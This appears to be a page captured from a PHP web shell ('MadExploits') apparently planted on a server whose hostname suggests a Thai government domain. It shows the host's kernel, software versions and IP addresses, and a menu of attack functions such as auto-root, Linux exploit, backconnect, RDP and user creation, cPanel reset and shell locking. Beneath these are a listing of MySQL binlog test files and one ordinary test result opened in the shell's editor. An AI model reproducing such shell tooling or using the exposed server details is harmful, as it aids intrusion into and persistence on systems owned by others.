Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
mysql-test /
suite /
binlog /
r /
[ HOME SHELL ]
Name
Size
Permission
Action
binlog_base64_flag.result
3.74
KB
-rw-r--r--
binlog_bug23533.result
486
B
-rw-r--r--
binlog_bug36391.result
129
B
-rw-r--r--
binlog_database.result
5.28
KB
-rw-r--r--
binlog_delete_and_flush_index....
1.75
KB
-rw-r--r--
binlog_drop_if_exists.result
5.26
KB
-rw-r--r--
binlog_grant.result
1.18
KB
-rw-r--r--
binlog_incident.result
181
B
-rw-r--r--
binlog_index.result
5.2
KB
-rw-r--r--
binlog_innodb.result
6.05
KB
-rw-r--r--
binlog_innodb_row.result
2.47
KB
-rw-r--r--
binlog_killed.result
3.43
KB
-rw-r--r--
binlog_killed_simulate.result
1.25
KB
-rw-r--r--
binlog_mix_innodb_stat.result
610
B
-rw-r--r--
binlog_mixed_failure_mixing_en...
16.79
KB
-rw-r--r--
binlog_mixed_load_data.result
429
B
-rw-r--r--
binlog_multi_engine.result
4.59
KB
-rw-r--r--
binlog_mysqlbinlog-cp932.resul...
344
B
-rw-r--r--
binlog_mysqlbinlog2.result
36.63
KB
-rw-r--r--
binlog_mysqlbinlog_base64.resu...
1.69
KB
-rw-r--r--
binlog_mysqlbinlog_row.result
150.85
KB
-rw-r--r--
binlog_mysqlbinlog_row_innodb....
239.94
KB
-rw-r--r--
binlog_mysqlbinlog_row_myisam....
241.25
KB
-rw-r--r--
binlog_mysqlbinlog_row_trans.r...
16.1
KB
-rw-r--r--
binlog_old_versions.result
1.3
KB
-rw-r--r--
binlog_query_filter_rules.resu...
173
B
-rw-r--r--
binlog_reset_master.result
14
B
-rw-r--r--
binlog_row_binlog.result
76.4
KB
-rw-r--r--
binlog_row_ctype_cp932.result
87.42
KB
-rw-r--r--
binlog_row_ctype_ucs.result
1.27
KB
-rw-r--r--
binlog_row_drop_tmp_tbl.result
1.17
KB
-rw-r--r--
binlog_row_failure_mixing_engi...
18.09
KB
-rw-r--r--
binlog_row_innodb_stat.result
610
B
-rw-r--r--
binlog_row_insert_select.resul...
829
B
-rw-r--r--
binlog_row_mix_innodb_myisam.r...
32.72
KB
-rw-r--r--
binlog_row_mysqlbinlog_db_filt...
1.5
KB
-rw-r--r--
binlog_row_mysqlbinlog_verbose...
2.68
KB
-rw-r--r--
binlog_server_id.result
1.2
KB
-rw-r--r--
binlog_sf.result
1.67
KB
-rw-r--r--
binlog_sql_mode.result
3.51
KB
-rw-r--r--
binlog_start_comment.result
357
B
-rw-r--r--
binlog_statement_insert_delaye...
949
B
-rw-r--r--
binlog_stm_binlog.result
51.51
KB
-rw-r--r--
binlog_stm_blackhole.result
7.29
KB
-rw-r--r--
binlog_stm_ctype_cp932.result
87.42
KB
-rw-r--r--
binlog_stm_ctype_ucs.result
1.29
KB
-rw-r--r--
binlog_stm_do_db.result
2.08
KB
-rw-r--r--
binlog_stm_drop_tmp_tbl.result
2.3
KB
-rw-r--r--
binlog_stm_innodb_stat.result
610
B
-rw-r--r--
binlog_stm_insert_select.resul...
707
B
-rw-r--r--
binlog_stm_mix_innodb_myisam.r...
30.23
KB
-rw-r--r--
binlog_stm_ps.result
811
B
-rw-r--r--
binlog_stm_row.result
2.48
KB
-rw-r--r--
binlog_stm_unsafe_warning.resu...
1.71
KB
-rw-r--r--
binlog_tmp_table.result
877
B
-rw-r--r--
binlog_truncate_innodb.result
2.45
KB
-rw-r--r--
binlog_truncate_myisam.result
439
B
-rw-r--r--
binlog_unsafe.result
13.81
KB
-rw-r--r--
binlog_write_error.result
3.58
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : binlog_stm_row.result
CALL mtr.add_suppression("Statement may not be safe to log in statement format."); DROP TABLE IF EXISTS t1; DROP TABLE IF EXISTS t2; set @saved_global_binlog_format = @@global.binlog_format; set @saved_local_binlog_format = @@session.binlog_format; SET GLOBAL BINLOG_FORMAT = STATEMENT; SET SESSION BINLOG_FORMAT = STATEMENT; CREATE TABLE t1 (a INT); CREATE TABLE t2 LIKE t1; select @@SESSION.BINLOG_FORMAT; @@SESSION.BINLOG_FORMAT STATEMENT INSERT INTO t1 VALUES(1); INSERT INTO t2 VALUES(2); # # Ensure that INSERT INTO .. SELECT FROM under SBR takes a read # lock that will prevent the source table from being modified. # # con1 SELECT GET_LOCK('Bug#34306', 120); GET_LOCK('Bug#34306', 120) 1 # con2 PREPARE stmt FROM "INSERT INTO t1 SELECT * FROM t2 WHERE GET_LOCK('Bug#34306', 120)"; EXECUTE stmt;; # default INSERT INTO t2 VALUES (3);; # con1 SELECT RELEASE_LOCK('Bug#34306'); RELEASE_LOCK('Bug#34306') 1 # con2 Warnings: Note 1592 Statement may not be safe to log in statement format. SELECT RELEASE_LOCK('Bug#34306'); RELEASE_LOCK('Bug#34306') 1 # default # # Ensure that INSERT INTO .. SELECT FROM prepared under SBR does # not prevent the source table from being modified if under RBR. # # con2 SET SESSION BINLOG_FORMAT = ROW; # con1 SELECT GET_LOCK('Bug#34306', 120); GET_LOCK('Bug#34306', 120) 1 # con2 EXECUTE stmt;; # default # con1 INSERT INTO t2 VALUES (4); SELECT RELEASE_LOCK('Bug#34306'); RELEASE_LOCK('Bug#34306') 1 # con2 # default # Show binlog events show binlog events from <binlog_start>; Log_name Pos Event_type Server_id End_log_pos Info master-bin.000001 # Query # # use `test`; DROP TABLE IF EXISTS t1 master-bin.000001 # Query # # use `test`; DROP TABLE IF EXISTS t2 master-bin.000001 # Query # # use `test`; CREATE TABLE t1 (a INT) master-bin.000001 # Query # # use `test`; CREATE TABLE t2 LIKE t1 master-bin.000001 # Query # # use `test`; INSERT INTO t1 VALUES(1) master-bin.000001 # Query # # use `test`; INSERT INTO t2 VALUES(2) master-bin.000001 # Query # # use `test`; INSERT INTO t1 SELECT * FROM t2 WHERE GET_LOCK('Bug#34306', 120) master-bin.000001 # Query # # use `test`; INSERT INTO t2 VALUES (3) master-bin.000001 # Query # # use `test`; INSERT INTO t2 VALUES (4) master-bin.000001 # Query # # BEGIN master-bin.000001 # Table_map # # table_id: # (test.t1) master-bin.000001 # Write_rows # # table_id: # flags: STMT_END_F master-bin.000001 # Query # # COMMIT DROP TABLE t1; DROP TABLE t2; SET GLOBAL BINLOG_FORMAT = @saved_global_binlog_format; SET SESSION BINLOG_FORMAT = @saved_local_binlog_format;
Close